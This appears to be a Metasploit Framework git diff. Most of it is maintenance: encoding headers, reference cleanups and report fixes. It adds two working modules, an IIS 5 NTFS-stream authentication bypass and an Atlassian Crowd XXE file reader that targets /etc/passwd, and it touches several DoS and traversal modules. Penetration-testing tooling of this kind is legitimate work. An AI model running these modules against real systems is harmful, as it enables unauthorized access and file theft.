@@ -14,8 +15,8 @@ class Entry
attr_reader :data
def initialize(fname, data, compmeth, timestamp=nil, attrs=nil, xtra=nil, comment=nil)
- @name = fname
- @data = data
+ @name = fname.unpack("C*").pack("C*")
+ @data = data.unpack("C*").pack("C*")
@xtra = xtra
@xtra ||= ''
@comment = comment
@@ -37,7 +38,7 @@ class Entry
end
def data=(val)
- @data = val
+ @data = val.unpack("C*").pack("C*")
compress
end
@@ -84,11 +85,9 @@ class Entry
# Return the compressed data in a format suitable for adding to an Archive
#
def pack
- ret = ''
-
# - lfh 1
lfh = LocalFileHdr.new(self)
- ret << lfh.pack
+ ret = lfh.pack
# - data 1
if (@compdata)
diff --git a/lib/rex/zip/jar.rb b/lib/rex/zip/jar.rb
index b113ec3eaf..cf70acf3ad 100644
--- a/lib/rex/zip/jar.rb
+++ b/lib/rex/zip/jar.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/zip/archive'
diff --git a/lib/rex/zip/samples/comment.rb b/lib/rex/zip/samples/comment.rb
index a879554b00..8bb5295517 100755
--- a/lib/rex/zip/samples/comment.rb
+++ b/lib/rex/zip/samples/comment.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# Create a zip file with comments!
diff --git a/lib/rex/zip/samples/mkwar.rb b/lib/rex/zip/samples/mkwar.rb
index 6f7e031f0c..8817a1a51c 100755
--- a/lib/rex/zip/samples/mkwar.rb
+++ b/lib/rex/zip/samples/mkwar.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# Create a WAR archive!
diff --git a/lib/rex/zip/samples/mkzip.rb b/lib/rex/zip/samples/mkzip.rb
index a238227f52..a2b288238e 100755
--- a/lib/rex/zip/samples/mkzip.rb
+++ b/lib/rex/zip/samples/mkzip.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# Add a file from memory and save it.
diff --git a/lib/rex/zip/samples/recursive.rb b/lib/rex/zip/samples/recursive.rb
index 3079a6cbe5..c05837c69f 100755
--- a/lib/rex/zip/samples/recursive.rb
+++ b/lib/rex/zip/samples/recursive.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/sshkey.rb b/lib/sshkey.rb
index a3bcfa7088..7cc281edc3 100644
--- a/lib/sshkey.rb
+++ b/lib/sshkey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class SSHKey
end
diff --git a/lib/sshkey/lib/sshkey.rb b/lib/sshkey/lib/sshkey.rb
index 147fa4b4cb..6035c10416 100644
--- a/lib/sshkey/lib/sshkey.rb
+++ b/lib/sshkey/lib/sshkey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
require 'base64'
require 'digest/md5'
diff --git a/lib/sshkey/lib/sshkey/version.rb b/lib/sshkey/lib/sshkey/version.rb
index f049da0109..398c0e44fb 100644
--- a/lib/sshkey/lib/sshkey/version.rb
+++ b/lib/sshkey/lib/sshkey/version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class SSHKey
VERSION = "1.3.0"
end
diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
index 611862b525..c3588f89b9 100644
--- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
+++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '5798' ],
[ 'BID', '10224' ],
#[ 'CVE', '' ],# No CVE!
- [ 'URL', 'http://www.milw0rm.com/exploits/294' ],
+ [ 'EDB', '294' ]
],
'DisclosureDate' => 'Apr 27 2004'))
diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb
new file mode 100644
index 0000000000..f6bad79e27
--- /dev/null
+++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb
@@ -0,0 +1,97 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',
+ 'Description' => %q{
+ This module bypasses basic authentication for Internet Information Services (IIS).
+ By appending the NTFS stream name to the directory name in a request, it is
+ possible to bypass authentication.
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2010-2731' ],
+ [ 'OSVDB', '66160' ],
+ [ 'MSB', 'MS10-065' ],
+ [ 'URL', 'http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]
+ ],
+ 'Author' =>
+ [
+ 'Soroush Dalili',
+ 'sinn3r'
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => "Jul 02 2010"
+ ))
+
+ register_options(
+ [
+ OptString.new("TARGETURI", [true, 'The URI directory where basic auth is enabled', '/'])
+ ], self.class)
+ end
+
+
+ def has_auth
+ uri = target_uri.path
+ uri << '/' if uri[-1, 1] != '/'
+
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'GET'
+ })
+ vprint_status(res.body) if res
+
+ return (res and res.code == 401)
+ end
+
+ def try_auth
+ uri = target_uri.path
+ uri << '/' if uri[-1, 1] != '/'
+ uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"
+
+ dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'
+
+ user = Rex::Text.rand_text_alpha(rand(10) + 5)
+ pass = Rex::Text.rand_text_alpha(rand(10) + 5)
+
+
+ vprint_status("Requesting: #{dir}")
+ res = send_request_cgi({
+ 'uri' => dir,
+ 'method' => 'GET',
+ 'basic_auth' => "#{user}:#{pass}"
+ })
+ vprint_status(res.body) if res
+
+ return (res and res.code != 401 and res.code != 404) ? dir : ''
+ end
+
+ def run
+ @peer = "#{rhost}:#{rport}"
+
+ if not has_auth
+ print_error("#{@peer} - No basic authentication enabled")
+ return
+ end
+
+ bypass_string = try_auth
+
+ if bypass_string.empty?
+ print_error("#{@peer} - The bypass attempt did not work")
+ else
+ print_good("#{@peer} - You can bypass auth by doing: #{bypass_string}")
+ end
+ end
+
+end
diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb
index a5a0504938..11b9d72e43 100644
--- a/modules/auxiliary/dos/http/apache_mod_isapi.rb
+++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb
@@ -66,8 +66,8 @@ class Metasploit3 < Msf::Auxiliary
def run
serverIP = datastore['RHOST']
- if (datastore['RPORT'] != 80)
- serverIP += ":" + datastore['RPORT']
+ if (datastore['RPORT'].o_i != 80)
+ serverIP += ":" + datastore['RPORT'].to_s
end
isapiURI = datastore['ISAPI']
diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb
index f008820283..8e7407779d 100644
--- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb
+++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '2577' ],
[ 'CVE', '2003-0694' ],
[ 'BID', '8641' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/24' ],
+ [ 'EDB', '24' ]
],
'DisclosureDate' => 'Sep 17 2003'))
end
diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
index 0e45655dee..75ba28552e 100644
--- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
+++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
@@ -35,8 +35,8 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '15346' ],
[ 'CVE', '2005-3589' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/1336' ],
- [ 'OSVDB', '20817' ],
+ [ 'EDB', '1336' ],
+ [ 'OSVDB', '20817' ]
],
'DisclosureDate' => 'Nov 07 2005'))
end
diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb
index 459ec33377..f4ffbb1c95 100644
--- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb
+++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb
@@ -33,8 +33,8 @@ class Metasploit3 < Msf::Auxiliary
[ 'BID', '21542' ],
[ 'BID', '21549' ],
[ 'CVE', '2006-6565' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/2914' ],
- [ 'OSVDB', '34435' ],
+ [ 'EDB', '2914' ],
+ [ 'OSVDB', '34435' ]
],
'DisclosureDate' => 'Dec 11 2006'))
end
diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb
index 2adcb4e564..a22fbf5b85 100644
--- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb
+++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-4572' ],
[ 'OSVDB', '49045' ],
- [ 'URL', 'http://milw0rm.com/exploits/6738']
+ [ 'EDB', '6738']
],
'DisclosureDate' => 'Oct 12 2008'))
diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb
index 87c057f011..76f363880f 100644
--- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb
+++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-6082'],
[ 'OSVDB', '49177'],
- [ 'URL', 'http://milw0rm.com/exploits/6753']
+ [ 'EDB', '6753']
],
'DisclosureDate' => 'Oct 14 2008'))
diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb
index 9e4f3dfe77..0df99d2953 100644
--- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb
+++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2008-2031' ],
[ 'CVE', '2008-6829' ],
[ 'OSVDB', '44608' ],
- [ 'URL', 'http://milw0rm.com/exploits/6834' ]
+ [ 'EDB', '6834' ]
],
'DisclosureDate' => 'Oct 24 2008'))
diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
index 1e76129465..9c3eca5167 100644
--- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
+++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-5666' ],
[ 'OSVDB', '49043' ],
- [ 'URL', 'http://milw0rm.com/exploits/6581' ]
+ [ 'EDB', '6581' ]
],
'DisclosureDate' => 'Sep 26 2008'))
end
diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb
index 8cc04ac605..e9b97b3d84 100644
--- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb
+++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-5626'],
[ 'OSVDB', '50837'],
- [ 'URL', 'http://milw0rm.com/exploits/6741' ]
+ [ 'EDB', '6741' ]
],
'DisclosureDate' => 'Oct 13 2008'))
diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb
index ff4368dcc0..446e5de70f 100644
--- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb
+++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
'References' => [
[ 'CVE', '2008-5626'],
[ 'OSVDB', '50837'],
- [ 'URL', 'http://milw0rm.com/exploits/8294' ]
+ [ 'EDB', '8294' ]
],
'DisclosureDate' => 'Mar 27 2009')
)
diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
index 799ceaedd1..c276f5a10d 100644
--- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
+++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
'References' => [
[ 'CVE', '2008-6938'],
[ 'OSVDB', '49998'],
- [ 'URL', 'http://milw0rm.com/exploits/7109' ]
+ [ 'EDB', '7109' ]
],
'DisclosureDate' => 'Nov 13 2008'))
diff --git a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
index bbd0a503ee..727ab63f03 100644
--- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
+++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
@@ -150,8 +150,9 @@ class Metasploit3 < Msf::Auxiliary
report_vuln({
:host => rhost,
:port => rport,
- :name => self.fullname,
- :refs => self.references
+ :name => self.name,
+ :refs => self.references,
+ :info => "Module #{self.fullname} successfully crashed the target system via RDP"
})
else
print_status("#{rhost}:#{rport} is still up")
diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb
index 1d9ecc3420..f54a55de71 100644
--- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb
+++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-1311'],
[ 'OSVDB', '42932'],
- [ 'URL', 'http://milw0rm.com/exploits/6863']
+ [ 'EDB', '6863']
],
'DisclosureDate' => 'Oct 29 2008'))
diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
index e708ff5671..df27a76719 100644
--- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
+++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
@@ -1,4 +1,3 @@
-##
# $Id$
##
@@ -167,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
@evilchars = ['']
end
- print_status("Connecting to host " + ip + " on port " + datastore['RPORT'])
+ print_status("Connecting to host " + ip + " on port " + datastore['RPORT'].to_s)
if (startstage == 1)
process_phase(1, "Fuzzing without command")
diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb
index c77a6972bd..0ca9e4b3fd 100644
--- a/modules/auxiliary/fuzzers/http/http_form_field.rb
+++ b/modules/auxiliary/fuzzers/http/http_form_field.rb
@@ -97,14 +97,14 @@ class Metasploit3 < Msf::Auxiliary
'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive' => '300',
'Connection' => 'keep-alive',
- 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'],
+ 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
'Content-Type' => 'application/x-www-form-urlencoded',
}
}
@get_data_headers = {
'Host' => host,
'User-Agent' => useragent,
- 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'],
+ 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
}
end
diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
new file mode 100644
index 0000000000..59a3fc7750
--- /dev/null
+++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
@@ -0,0 +1,152 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
+ 'Version' => '$Revision: $',
+ 'Description' => %q{
+ This module simply attempts to read a remote file from the server using a
+ vulnerability in the way Atlassian Crowd handles XML files. The vulnerability
+ occurs while trying to expand external entities with the SYSTEM identifier. This
+ module has been tested successfully on Linux and Windows installations of Crowd.
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2012-2926' ],
+ [ 'OSVDB', '82274' ],
+ [ 'BID', '53595' ],
+ [ 'URL', 'https://www.neg9.org' ], # General
+ [ 'URL', 'https://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17']
+ ],
+ 'Author' =>
+ [
+ 'Will Caput', # Vulnerability discovery and Metasploit module
+ 'Trevor Hartman', # Vulnerability discovery
+ 'Thaddeus Bogner', # Metasploit module
+ 'juan vazquez' # Metasploit module help
+ ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8095),
+ OptString.new('TARGETURI', [true, 'Path to Crowd', '/crowd/services']),
+ OptString.new('RFILE', [true, 'Remote File', '/etc/passwd'])
+
+ ], self.class)
+
+ register_autofilter_ports([ 8095 ])
+ deregister_options('RHOST')
+ end
+
+ def rport
+ datastore['RPORT']
+ end
+
+ def run_host(ip)
+ res = send_request_cgi({
+ 'uri' => target_uri.to_s,
+ 'method' => 'GET'})
+
+ if not res
+ print_error("#{rhost}:#{rport} Unable to connect")
+ return
+ end
+
+ accessfile(ip)
+ end
+
+ def accessfile(rhost)
+ print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
+
+ soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
+ xmlaut = 'http://authentication.integration.crowd.atlassian.com'
+ xmlsoap = 'http://soap.integration.crowd.atlassian.com'
+ entity = Rex::Text.rand_text_alpha(rand(4) + 4)
+
+ data = " ]>" + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << ''
+ data << "?&#{entity};"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+
+ res = send_request_cgi({
+ 'uri' => target_uri.to_s,
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => data,
+ 'headers' => {
+ 'SOAPAction' => '""',
+ }}, 60)
+
+ if res and res.code == 500
+ case res.body
+ when /Invalid boolean value: \?(.*)<\/faultstring>/m
+ loot = $1
+ if not loot or loot.empty?
+ print_status("#{rhost}#{rport} Retrieved empty file from #{rhost}:#{rport}")
+ return
+ end
+ f = ::File.basename(datastore['RFILE'])
+ path = store_loot('atlassian.crowd.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
+ print_status("#{rhost}:#{rport} Atlassian Crowd - #{datastore['RFILE']} saved in #{path}")
+ return
+ end
+ end
+
+ print_error("#{rhost}#{rport} Failed to retrieve file from #{rhost}:#{rport}")
+ end
+
+end
+
diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb
index a7f87975ef..70bfe3f04d 100644
--- a/modules/auxiliary/scanner/http/cisco_device_manager.rb
+++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb
@@ -73,8 +73,8 @@ class Metasploit3 < Msf::Auxiliary
:host => rhost,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "http://#{rhost}:#{rport}/exec/show/version/CR",
+ :name => self.name,
+ :info => "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/exec/show/version/CR",
:refs => self.references,
:exploited_at => Time.now.utc
}
diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
index 35e78cf958..80500f00f0 100644
--- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
@@ -64,8 +64,9 @@ class Metasploit3 < Msf::Auxiliary
:host => rhost,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "http://#{rhost}:#{rport}/level/#{level}/exec/show/version/CR",
+ :name => self.name,
+ :sname => ssl ? "https" : "http",
+ :info => "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/level/#{level}/exec/show/version/CR",
:refs => self.references,
:exploited_at => Time.now.utc
}
@@ -83,8 +84,10 @@ class Metasploit3 < Msf::Auxiliary
report_exploit(
{
:host => rhost,
- :service => rport,
- :name => self.fullname
+ :port => rport,
+ :name => self.name,
+ :sname => ssl ? "https" : "http",
+ :info => "Module #{self.fullname} successfully captured the configuration file:\n#{config}"
}
)
else
diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb
index e83a8b8352..21d0dfb878 100644
--- a/modules/auxiliary/scanner/http/frontpage_login.rb
+++ b/modules/auxiliary/scanner/http/frontpage_login.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
- 'Name' => 'FrontPage Server Extensions Login Utility',
+ 'Name' => 'FrontPage Server Extensions Anonymous Login Scanner',
'Version' => '$Revision$',
'Description' => 'This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.',
'References' =>
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
if datastore['RPORT'].to_i == 80 or datastore['RPORT'].to_i == 443
port = ""
else
- port = ":" + datastore['RPORT']
+ port = ":" + datastore['RPORT'].to_s
end
info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/"
@@ -133,8 +133,8 @@ class Metasploit3 < Msf::Auxiliary
:host => target_host,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "#{info} FrontPage ACCESS ALLOWED [#{retcode}]",
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed access to #{info} [#{retcode}]",
:refs => self.references,
:exploited_at => Time.now.utc
}
diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb
index a683121fd8..9bbc8b123e 100644
--- a/modules/auxiliary/scanner/http/http_put.rb
+++ b/modules/auxiliary/scanner/http/http_put.rb
@@ -150,13 +150,14 @@ class Metasploit4 < Msf::Auxiliary
#Check file
if not res.nil? and file_exists(path, data)
- print_good("File uploaded: #{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}")
+ turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
+ print_good("File uploaded: #{turl}")
report_vuln(
:host => ip,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "PUT Enabled",
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed write access to #{turl} via PUT",
:refs => self.references,
:exploited_at => Time.now.utc
)
@@ -182,14 +183,15 @@ class Metasploit4 < Msf::Auxiliary
if res.nil? or file_exists(path, data)
print_error("DELETE failed. File is still there.")
else
- print_good("File deleted: #{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}")
+ turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
+ print_good("File deleted: #{turl}")
report_vuln(
:host => ip,
:port => rport,
:proto => 'tcp',
:sname => (ssl ? 'https' : 'http'),
- :name => self.fullname,
- :info => "DELETE ENABLED",
+ :name => self.name,
+ :info => "Module #{self.fullname} confirmed write access to #{turl} via DELETE",
:refs => self.references,
:exploited_at => Time.now.utc
)
diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb
index cda7a4cf4e..071b726463 100644
--- a/modules/auxiliary/scanner/http/http_traversal.rb
+++ b/modules/auxiliary/scanner/http/http_traversal.rb
@@ -100,8 +100,9 @@ class Metasploit3 < Msf::Auxiliary
1.upto(depth) do |d|
file_to_read.each do |f|
trigger = base * d
- req = ini_request(datastore['PATH'] + trigger + f)
- vprint_status("Trying: http://#{rhost}:#{rport}#{req['uri']}")
+ p = datastore['PATH'] + trigger + f
+ req = ini_request(p)
+ vprint_status("Trying: http://#{rhost}:#{rport}#{p}")
res = send_request_cgi(req, 25)
return trigger if res and res.to_s =~ datastore['PATTERN']
end
@@ -137,8 +138,18 @@ class Metasploit3 < Msf::Auxiliary
when 'HEAD'
end
+ if not req['vars_get'].nil? or not req['vars_post'].nil? or not req['data'].nil?
+ begin
+ this_path = URI(uri).path
+ rescue ::URI::InvalidURIError
+ this_path = uri.scan(/^(.+)\?*.*/).flatten[0]
+ end
+ else
+ this_path = uri
+ end
+
req['method'] = datastore['METHOD']
- req['uri'] = uri
+ req['uri'] = this_path
req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty?
req['data'] = datastore['DATA'] if not datastore['DATA'].empty?
req['basic_auth'] = datastore['BASICAUTH'] if not datastore['BASICAUTH'].empty?
diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
index f8afd7abc8..c19ab94da5 100644
--- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
+++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
@@ -22,13 +22,12 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
- 'Name' => 'MS09-020 IIS6 WebDAV Unicode Auth Bypass',
+ 'Name' => 'MS09-020 IIS6 WebDAV Unicode Authentication Bypass',
'Description' => %q{
- Simplified version of MS09-020 IIS6 WebDAV Unicode Auth Bypass scanner. It attempts
- to bypass authentication using the WebDAV IIS6 Unicode vulnerability
- discovered by Kingcope. The vulnerability appears to be exploitable
- where WebDAV is enabled on the IIS6 server, and any protected folder
- requires either Basic, Digest or NTLM authentication.
+ This module attempts to to bypass authentication using the WebDAV IIS6
+ Unicode vulnerability discovered by Kingcope. The vulnerability appears
+ to be exploitable where WebDAV is enabled on the IIS6 server, and any
+ protected folder requires either Basic, Digest or NTLM authentication.
},
'Author' => [ 'et', 'patrick' ],
'Version' => '$Revision$',
@@ -77,8 +76,8 @@ class Metasploit3 < Msf::Auxiliary
if(not res)
print_error("NO Response.")
elsif (res.code.to_i == 401)
- print_status("Confirmed protected folder #{wmap_base_url}#{tpath} #{res.code} (#{wmap_target_host})")
- print_status("\tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
+ print_status("#{rhost}:#{rport} Confirmed protected folder #{wmap_base_url}#{tpath} #{res.code} (#{wmap_target_host})")
+ print_status("#{rhost}:#{rport} \tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
cset = %W{ & ^ % $ # @ ! }
buff = ''
@@ -100,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
}, 20)
if (res.code.to_i == 207)
- print_status("\tFound vulnerable WebDAV Unicode bypass. #{wmap_base_url}#{tpath}#{bogus}/ #{res.code} (#{wmap_target_host})")
+ print_status("#{rhost}:#{rport} \tFound vulnerable WebDAV Unicode bypass. #{wmap_base_url}#{tpath}#{bogus}/ #{res.code} (#{wmap_target_host})")
report_vuln(
@@ -108,8 +107,9 @@ class Metasploit3 < Msf::Auxiliary
:host => ip,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "#{tpath}#{bogus} / Code: #{res.code}",
+ :sname => ssl ? 'https' : 'http',
+ :name => self.name,
+ :info => "Module #{self.fullname} bypassed authentication with #{tpath}#{bogus} (response code #{res.code})",
:refs => self.references,
:exploited_at => Time.now.utc
}
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
end
else
- print_error("Folder does not require authentication. [#{res.code}]")
+ print_error("#{rhost}:#{rport} Folder does not require authentication. [#{res.code}]")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::E877PIPE
